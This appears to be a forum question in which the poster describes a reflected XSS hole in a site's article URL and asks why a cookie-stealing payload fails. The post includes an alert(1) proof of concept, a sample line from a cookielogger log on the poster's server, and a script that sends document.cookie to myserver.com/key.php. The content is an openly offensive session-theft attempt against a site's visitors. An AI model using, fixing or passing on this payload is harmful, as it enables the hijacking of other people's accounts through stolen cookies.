I just found a website with a XSS vulnerability. When I visit the following URL, a pop up occurs:
https://example.com/article/HALLOWEEN"><script>alert(1);</script>
I have a cookielogger.php on my server with this code, so that when I visit myserver.com/key.php
, a line is added to myserver.com/log.txt
like this:
IP: 15x.1xx.xxx.xx | PORT: 58554 | HOST: | Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 | METHOD: | REF: | DATE: Friday 21st 2018f September 2018 07:34:25 PM | COOKIE:
But when I modify my URL to this one below, the cookie is not logged to my server
https://example.com/article/HALLOWEEN"><script language= "JavaScript">document.location="http://myserver.com/key.php?cookie=" + document.cookie;</script>